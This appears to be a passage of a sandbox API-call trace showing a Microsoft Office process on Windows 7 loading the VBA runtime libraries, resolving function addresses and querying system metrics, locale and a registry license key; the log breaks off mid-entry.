"mso.frameprotocolwin32.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSO.FRAMEPROTOCOLWIN32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mso.frameprotocolwin32.dll") Thread: id = 1 os_tid = 0x934 Thread: id = 2 os_tid = 0x930 Thread: id = 3 os_tid = 0x92c Thread: id = 4 os_tid = 0x928 Thread: id = 5 os_tid = 0x924 Thread: id = 6 os_tid = 0x920 Thread: id = 7 os_tid = 0x91c Thread: id = 8 os_tid = 0x918 Thread: id = 9 os_tid = 0x914 Thread: id = 10 os_tid = 0x910 Thread: id = 11 os_tid = 0x90c Thread: id = 12 os_tid = 0x908 Thread: id = 13 os_tid = 0x904 Thread: id = 14 os_tid = 0x900 Thread: id = 15 os_tid = 0x8fc Thread: id = 16 os_tid = 0x8dc Thread: id = 17 os_tid = 0x8d8 Thread: id = 18 os_tid = 0x8d4 Thread: id = 19 os_tid = 0x8d0 Thread: id = 20 os_tid = 0x8cc Thread: id = 21 os_tid = 0x8c0 [0039.245] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x180670 | out: lpSystemTimeAsFileTime=0x180670*(dwLowDateTime=0xbce052e0, dwHighDateTime=0x1d48db2)) [0039.245] GetCurrentProcessId () returned 0x8bc [0039.245] GetCurrentThreadId () returned 0x8c0 [0039.245] GetTickCount () returned 0x187e4 [0039.245] QueryPerformanceCounter (in: lpPerformanceCount=0x180678 | out: lpPerformanceCount=0x180678*=1810686900000) returned 1 [0039.247] __dllonexit () returned 0x7fe836a005c00000 [0039.248] __dllonexit () returned 0x7fe836a2c3800000 [0039.249] __dllonexit () returned 0x7fe836a2f1400000 [0039.250] __dllonexit () returned 0x7fe836a30c800000 [0039.250] __dllonexit () returned 0x7fe836a2f4c00000 [0039.251] __dllonexit () returned 0x7fe836a2fac00000 [0039.251] __dllonexit () returned 0x7fe836a2f8c00000 [0039.251] __dllonexit () returned 0x7fe836a2fec00000 [0039.252] __dllonexit () returned 0x7fe836a2fcc00000 [0039.252] __dllonexit () returned 0x7fe836a2e2c00000 [0039.252] __dllonexit () returned 0x7fe836a2e0c00000 [0039.253] __dllonexit () returned 0x7fe836a2e6c00000 [0039.253] __dllonexit () returned 0x7fe836a2e4c00000 [0039.253] __dllonexit () returned 0x7fe836a2eac00000 [0039.254] __dllonexit () returned 0x7fe836a2e8c00000 [0039.254] __dllonexit () returned 0x7fe836a2eec00000 [0039.254] __dllonexit () returned 0x7fe836a2ecc00000 [0039.254] __dllonexit () returned 0x7fe836a22fc00000 [0039.255] __dllonexit () returned 0x7fe836a008c00000 [0039.255] __dllonexit () returned 0x7fe836a00fc00000 [0039.256] __dllonexit () returned 0x7fe836a00dc00000 [0039.256] __dllonexit () returned 0x7fe836a3f0c00000 [0039.256] __dllonexit () returned 0x7fe836a3f7c00000 [0039.256] __dllonexit () returned 0x7fe836a3f4000000 [0039.257] DisableThreadLibraryCalls (hLibModule=0x7fee4230000) returned 1 [0039.257] GetVersion () returned 0x1db10106 [0039.257] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0039.257] GetUserDefaultLCID () returned 0x409 [0039.257] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0039.257] GetSystemMetrics (nIndex=5) returned 1 [0039.257] GetSystemMetrics (nIndex=6) returned 1 [0039.257] GetSystemMetrics (nIndex=11) returned 32 [0039.258] GetSystemMetrics (nIndex=12) returned 32 [0039.258] GetSystemMetrics (nIndex=34) returned 132 [0039.258] GetSystemMetrics (nIndex=35) returned 38 [0039.258] GetSystemMetrics (nIndex=0) returned 1440 [0039.258] GetSystemMetrics (nIndex=1) returned 900 [0039.258] GetSystemMetrics (nIndex=32) returned 4 [0039.258] GetSystemMetrics (nIndex=33) returned 4 [0039.258] GetSystemMetrics (nIndex=4) returned 22 [0039.258] GetSystemMetrics (nIndex=42) returned 0 [0039.258] GetStockObject (i=15) returned 0x188000b [0039.258] GetStockObject (i=7) returned 0x1b00017 [0039.258] GetStockObject (i=6) returned 0x1b00018 [0039.258] GetStockObject (i=8) returned 0x1b00016 [0039.258] GetStockObject (i=4) returned 0x1900011 [0039.258] GetStockObject (i=2) returned 0x1900012 [0039.258] GetStockObject (i=0) returned 0x1900010 [0039.258] GetStockObject (i=5) returned 0x1900015 [0039.258] GetStockObject (i=13) returned 0x18a002e [0039.258] GetDC (hWnd=0x0) returned 0x1801025d [0039.258] GetDeviceCaps (hdc=0x1801025d, index=14) returned 1 [0039.258] GetDeviceCaps (hdc=0x1801025d, index=12) returned 32 [0039.258] GetDeviceCaps (hdc=0x1801025d, index=88) returned 96 [0039.258] GetDeviceCaps (hdc=0x1801025d, index=90) returned 96 [0039.258] GetDeviceCaps (hdc=0x1801025d, index=38) returned 32409 [0039.258] ReleaseDC (hWnd=0x0, hDC=0x1801025d) returned 1 [0039.258] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x7fee460ba60 | out: ppMalloc=0x7fee460ba60*=0x7feffc15380) returned 0x0 [0040.264] GetModuleHandleA (lpModuleName=0x0) returned 0x13f550000 [0040.266] QueryActCtxW (in: dwFlags=0x80000010, hActCtx=0x7fee460a048, pvSubInstance=0x0, ulInfoClass=0x1, pvBuffer=0x187240, cbBuffer=0x10, pcbWrittenOrRequired=0x0 | out: pvBuffer=0x187240, pcbWrittenOrRequired=0x0) returned 1 [0040.267] ActivateActCtx (in: hActCtx=0x6847538, lpCookie=0x187230 | out: hActCtx=0x6847538, lpCookie=0x187230) returned 1 [0040.267] FindActCtxSectionStringW (in: dwFlags=0x0, lpExtensionGuid=0x0, ulSectionId=0x2, lpStringToFind="Comctl32.dll", ReturnedData=0x187250 | out: ReturnedData=0x187250) returned 1 [0040.267] LoadLibraryW (lpLibFileName="Comctl32.dll") returned 0x7fefc690000 [0040.268] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a0000016f) returned 1 [0040.268] RegisterClassA (lpWndClass=0x187580) returned 0x401701f7c195 [0040.269] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a00000170) returned 1 [0040.270] wcscpy_s (in: _Destination=0x3f07e50, _SizeInWords=0x7, _Source="Common" | out: _Destination="Common") returned 0x0 [0040.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word Documents (*.docm;*.dotm;*.doc;*.dot)", cchWideChar=70, lpMultiByteStr=0x2742540, cbMultiByte=140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word Documents (*.docm;*.dotm;*.doc;*.dot)", lpUsedDefaultChar=0x0) returned 70 [0040.272] GetModuleHandleExA (in: dwFlags=0x0, lpModuleName="MSI.DLL", phModule=0x7fee4611418 | out: phModule=0x7fee4611418*=0x7fefa750000) returned 1 [0040.273] GetProcAddress (hModule=0x7fefa750000, lpProcName="MsiProvideQualifiedComponentA") returned 0x7fefa7d3b3c [0040.273] GetProcAddress (hModule=0x7fefa750000, lpProcName="MsiGetProductCodeA") returned 0x7fefa7ca13c [0040.274] GetProcAddress (hModule=0x7fefa750000, lpProcName="MsiReinstallFeatureA") returned 0x7fefa7d1618 [0040.274] GetProcAddress (hModule=0x7fefa750000, lpProcName="MsiProvideComponentA") returned 0x7fefa7cf088 [0040.284] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0040.284] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0040.284] lstrcpyW (in: lpString1=0x187300, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" [0040.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", cchWideChar=-1, lpMultiByteStr=0x1871f0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", lpUsedDefaultChar=0x0) returned 68 [0040.284] GetModuleHandleA (lpModuleName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x0 [0040.759] LoadLibraryExA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", hFile=0x0, dwFlags=0x8) returned 0x7fee3a50000 [0040.802] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a00000171) returned 1 [0040.802] GetLastError () returned 0x0 [0040.802] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoVBADigSigCallDlg") returned 0x7fee3b572c0 [0040.803] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoVbaInitSecurity") returned 0x7fee3ac60b0 [0040.803] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFIEPolicyAndVersion") returned 0x7fee3a71a60 [0040.803] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFAnsiCodePageSupportsLCID") returned 0x7fee3ac5f50 [0040.804] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFInitOffice") returned 0x7fee3a6f000 [0040.804] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoUninitOffice") returned 0x7fee3a5e860 [0040.804] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFGetFontSettings") returned 0x7fee3a53fc0 [0040.804] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoRgchToRgwch") returned 0x7fee3a62380 [0040.805] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoHrSimpleQueryInterface") returned 0x7fee3a57b80 [0040.805] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoHrSimpleQueryInterface2") returned 0x7fee3a57b20 [0040.805] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFCreateControl") returned 0x7fee3a58730 [0040.806] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFLongLoad") returned 0x7fee3b93260 [0040.806] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFLongSave") returned 0x7fee3b93280 [0040.806] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFGetTooltips") returned 0x7fee3a61f40 [0040.807] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFSetTooltips") returned 0x7fee3ac6370 [0040.807] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFLoadToolbarSet") returned 0x7fee3ab4590 [0040.807] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFCreateToolbarSet") returned 0x7fee3a555b0 [0040.807] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoHpalOffice") returned 0x7fee3a60240 [0040.808] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFWndProcNeeded") returned 0x7fee3a53d10 [0040.808] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFWndProc") returned 0x7fee3a56d30 [0040.808] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFCreateITFCHwnd") returned 0x7fee3a53d40 [0040.808] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoDestroyITFC") returned 0x7fee3a5e6f0 [0040.809] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFPitbsFromHwndAndMsg") returned 0x7fee3a5df40 [0040.809] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFGetComponentManager") returned 0x7fee3a57bf0 [0040.809] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoMultiByteToWideChar") returned 0x7fee3a5fcd0 [0040.810] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoWideCharToMultiByte") returned 0x7fee3a58b20 [0040.810] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoHrRegisterAll") returned 0x7fee3b52ef0 [0040.810] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFSetComponentManager") returned 0x7fee3a642c0 [0040.810] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFCreateStdComponentManager") returned 0x7fee3a53e20 [0040.811] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFHandledMessageNeeded") returned 0x7fee3a5ab10 [0040.811] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoPeekMessage") returned 0x7fee3a5a7d0 [0040.811] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFCreateIPref") returned 0x7fee3a51550 [0040.812] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoDestroyIPref") returned 0x7fee3a5e830 [0040.812] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoChsFromLid") returned 0x7fee3a513d0 [0040.812] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoCpgFromChs") returned 0x7fee3a56660 [0040.812] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoSetLocale") returned 0x7fee3a51500 [0040.813] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoFSetHMsoinstOfSdm") returned 0x7fee3a53dd0 [0040.813] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoSetVbaInterfaces") returned 0x7fee3b571e0 [0040.813] GetProcAddress (hModule=0x7fee3a50000, lpProcName="MsoGetControlInstanceId") returned 0x7fee3b26d10 [0040.814] GetProcAddress (hModule=0x7fee3a50000, lpProcName="VbeuiFIsEdpEnabled") returned 0x7fee3b998e0 [0040.814] GetProcAddress (hModule=0x7fee3a50000, lpProcName="VbeuiEnterpriseProtect") returned 0x7fee3b99830 [0040.819] GetEnvironmentVariableA (in: lpName="DDRYBUR", lpBuffer=0x1872e0, nSize=0x118 | out: lpBuffer="\xaf\x01") returned 0x0 [0040.819] SetErrorMode (uMode=0x8001) returned 0x8001 [0040.819] GetModuleFileNameA (in: hModule=0x7fee4230000, lpFilename=0x186ff0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0040.819] lstrcpyA (in: lpString1=0x186ee0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0040.819] lstrcpyA (in: lpString1=0x186ee0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0040.819] lstrcpyA (in: lpString1=0x186ee0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0040.819] lstrcpyA (in: lpString1=0x186ee0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0040.819] lstrcpyA (in: lpString1=0x186ee0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0040.819] lstrcpyA (in: lpString1=0x186ee0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0040.819] strcpy_s (in: _Dst=0x187100, _DstSize=0x200, _Src="VBE7INTL.DLL" | out: _Dst="VBE7INTL.DLL") returned 0x0 [0040.819] _ultoa_s (in: _Val=0x409, _DstBuf=0x186c60, _Size=0x6, _Radix=10 | out: _DstBuf="1033") returned 0x0 [0040.819] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\", _SizeInBytes=0x104, _Source="1033" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033") returned 0x0 [0040.819] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033", _SizeInBytes=0x104, _Source="\\" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\") returned 0x0 [0040.820] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\", _SizeInBytes=0x104, _Source="VBE7INTL.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0040.820] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 75 [0040.820] CharToOemBuffA (in: lpszSrc="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", lpszDst=0x186b10, cchDstLength=0x4c | out: lpszDst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 1 [0040.820] _access_s (_FileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", _AccessMode=0) returned 0x0 [0040.822] strcpy_s (in: _Dst=0x186d90, _DstSize=0x104, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0040.822] LoadLibraryA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x7fef92d0000 [0040.825] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a00000172) returned 1 [0040.825] GetSystemDefaultLCID () returned 0x409 [0040.825] GetUserDefaultLCID () returned 0x409 [0040.825] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x187420, cchData=2 | out: lpLCData=".") returned 2 [0040.825] GetStockObject (i=13) returned 0x18a002e [0040.825] GetObjectA (in: h=0x18a002e, c=60, pv=0x1873c0 | out: pv=0x1873c0) returned 60 [0040.825] lstrcpyA (in: lpString1=0x7fee4611b70, lpString2="Vbui6.chm" | out: lpString1="Vbui6.chm") returned="Vbui6.chm" [0040.825] lstrcpyA (in: lpString1=0x7fee4610b40, lpString2="VbLR6.chm" | out: lpString1="VbLR6.chm") returned="VbLR6.chm" [0040.826] GetModuleFileNameA (in: hModule=0x7fee4230000, lpFilename=0x187460, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0040.826] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 66 [0040.826] lstrcpyA (in: lpString1=0x4ddc4e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" [0040.826] GetCurrentDirectoryA (in: nBufferLength=0x104, lpBuffer=0x1872f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0040.826] GetVersionExA (in: lpVersionInformation=0x187350*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x43, szCSDVersion="") | out: lpVersionInformation=0x187350*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0040.826] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="Licenses", phkResult=0x187278 | out: phkResult=0x187278*=0x9d2) returned 0x0 [0040.827] strcpy_s (in: _Dst=0x187280, _DstSize=0x80, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0040.827] strcpy_s (in: _Dst=0x187300, _DstSize=0xc8, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0040.827] _strrev (in: _Str="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Str="7E25578F0000-E3CB-1d11-377B-B8554088") returned="7E25578F0000-E3CB-1d11-377B-B8554088" [0040.827] RegQueryValueA (in: hKey=0x9d2, lpSubKey="8804558B-B773-11d1-BC3E-0000F87552E7", lpData=0x187300, lpcbData=0x187270 | out: lpData="\x0f}\x02\x01", lpcbData=0x187270) returned 0x2 [0040.827] RegCloseKey (hKey=0x9d2) returned 0x0 [0040.827] OleInitialize (pvReserved=0x0) returned 0x1 [0040.827] OaBuildVersion () returned 0x321396 [0040.827] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x7feffd80000 [0040.828] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a00000173) returned 1 [0040.828] GetLastError () returned 0x0 [0040.828] GetProcAddress (hModule=0x7feffd80000, lpProcName="SysFreeString") returned 0x7feffd81320 [0040.828] GetProcAddress (hModule=0x7feffd80000, lpProcName="LoadTypeLib") returned 0x7feffd8f1e0 [0040.828] GetProcAddress (hModule=0x7feffd80000, lpProcName="RegisterTypeLib") returned 0x7feffddcaa0 [0040.829] GetProcAddress (hModule=0x7feffd80000, lpProcName="QueryPathOfRegTypeLib") returned 0x7feffe11760 [0040.829] GetProcAddress (hModule=0x7feffd80000, lpProcName="UnRegisterTypeLib") returned 0x7feffe120d0 [0040.829] GetProcAddress (hModule=0x7feffd80000, lpProcName="OleTranslateColor") returned 0x7feffdac760 [0040.830] GetProcAddress (hModule=0x7feffd80000, lpProcName="OleCreateFontIndirect") returned 0x7feffddecd0 [0040.830] GetProcAddress (hModule=0x7feffd80000, lpProcName="OleCreatePictureIndirect") returned 0x7feffdde840 [0040.830] GetProcAddress (hModule=0x7feffd80000, lpProcName="OleLoadPicture") returned 0x7feffdef420 [0040.830] GetProcAddress (hModule=0x7feffd80000, lpProcName="OleCreatePropertyFrameIndirect") returned 0x7feffde4ec0 [0040.831] GetProcAddress (hModule=0x7feffd80000, lpProcName="OleCreatePropertyFrame") returned 0x7feffde9350 [0040.831] GetProcAddress (hModule=0x7feffd80000, lpProcName="OleIconToCursor") returned 0x7feffdb6e40 [0040.831] GetProcAddress (hModule=0x7feffd80000, lpProcName="LoadTypeLibEx") returned 0x7feffd8a550 [0040.832] GetProcAddress (hModule=0x7feffd80000, lpProcName="OleLoadPictureEx") returned 0x7feffdef320 [0040.832] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0040.832] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0040.832] GetClassInfoA (in: hInstance=0x7fee4230000, lpClassName="VBBubble", lpWndClass=0x1873b0 | out: lpWndClass=0x1873b0) returned 0 [0040.832] RegisterClassA (lpWndClass=0x1873b0) returned 0x1aa30362c197 [0040.832] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a00000174) returned 1 [0040.832] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Count") returned 0x107630 [0040.832] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_Default") returned 0x10c26a [0040.832] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Item") returned 0x107ad7 [0040.832] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Add") returned 0x1072f7 [0040.832] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Remove") returned 0x10b1cf [0040.832] GlobalAddAtomA (lpString="VBDisabled") returned 0x1aa40362c131 [0040.832] RegisterClassExA (param_1=0x1874d0) returned 0x1aa70420c198 [0040.832] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a00000175) returned 1 [0040.833] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderMain", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x101e8 [0040.833] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a00000176) returned 1 [0040.833] GetVersionExA (in: lpVersionInformation=0x1872c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1872c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0040.833] GetModuleHandleA (lpModuleName="USER32") returned 0x77a20000 [0040.834] GetProcAddress (hModule=0x77a20000, lpProcName="GetSystemMetrics") returned 0x77a394f0 [0040.834] GetProcAddress (hModule=0x77a20000, lpProcName="MonitorFromWindow") returned 0x77a35f08 [0040.834] GetProcAddress (hModule=0x77a20000, lpProcName="MonitorFromRect") returned 0x77a32b00 [0040.835] GetProcAddress (hModule=0x77a20000, lpProcName="MonitorFromPoint") returned 0x77a2ab64 [0040.835] GetProcAddress (hModule=0x77a20000, lpProcName="EnumDisplayMonitors") returned 0x77a35c30 [0040.835] GetProcAddress (hModule=0x77a20000, lpProcName="GetMonitorInfoA") returned 0x77a2a730 [0040.835] GetProcAddress (hModule=0x77a20000, lpProcName="EnumDisplayDevicesA") returned 0x77a2a5b4 [0040.835] MonitorFromWindow (hwnd=0x101e8, dwFlags=0x2) returned 0x10001 [0040.835] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x1874d0 | out: lpmi=0x1874d0) returned 1 [0040.835] SetWindowPos (hWnd=0x101e8, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0040.836] GetVersion () returned 0x1db10106 [0040.836] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x7feffd80000 [0040.836] GetProcAddress (hModule=0x7feffd80000, lpProcName="DispCallFunc") returned 0x7feffd82270 [0040.837] GetProcAddress (hModule=0x7feffd80000, lpProcName="LoadTypeLibEx") returned 0x7feffd8a550 [0040.837] GetProcAddress (hModule=0x7feffd80000, lpProcName="UnRegisterTypeLib") returned 0x7feffe120d0 [0040.837] GetProcAddress (hModule=0x7feffd80000, lpProcName="CreateTypeLib2") returned 0x7feffe0dbd0 [0040.837] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarDateFromUdate") returned 0x7feffd85c90 [0040.838] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarUdateFromDate") returned 0x7feffd86330 [0040.838] GetProcAddress (hModule=0x7feffd80000, lpProcName="GetAltMonthNames") returned 0x7feffda66c0 [0040.838] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarNumFromParseNum") returned 0x7feffd84710 [0040.838] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarParseNumFromStr") returned 0x7feffd848f0 [0040.839] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarDecFromR4") returned 0x7feffdbb640 [0040.839] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarDecFromR8") returned 0x7feffdbb360 [0040.839] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarDecFromDate") returned 0x7feffdc2640 [0040.840] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarDecFromI4") returned 0x7feffda58a0 [0040.840] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarDecFromCy") returned 0x7feffda5820 [0040.840] GetProcAddress (hModule=0x7feffd80000, lpProcName="VarR4FromDec") returned 0x7feffdbaf20 [0040.840] GetProcAddress (hModule=0x7feffd80000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7feffdda0c0 [0040.841] GetProcAddress (hModule=0x7feffd80000, lpProcName="GetRecordInfoFromGuids") returned 0x7feffe12160 [0040.841] GetProcAddress (hModule=0x7feffd80000, lpProcName="SafeArrayGetRecordInfo") returned 0x7feffda5af0 [0040.841] GetProcAddress (hModule=0x7feffd80000, lpProcName="SafeArraySetRecordInfo") returned 0x7feffda5a90 [0040.841] GetProcAddress (hModule=0x7feffd80000, lpProcName="SafeArrayGetIID") returned 0x7feffda5a60 [0040.842] GetProcAddress (hModule=0x7feffd80000, lpProcName="SafeArraySetIID") returned 0x7feffda5a30 [0040.842] 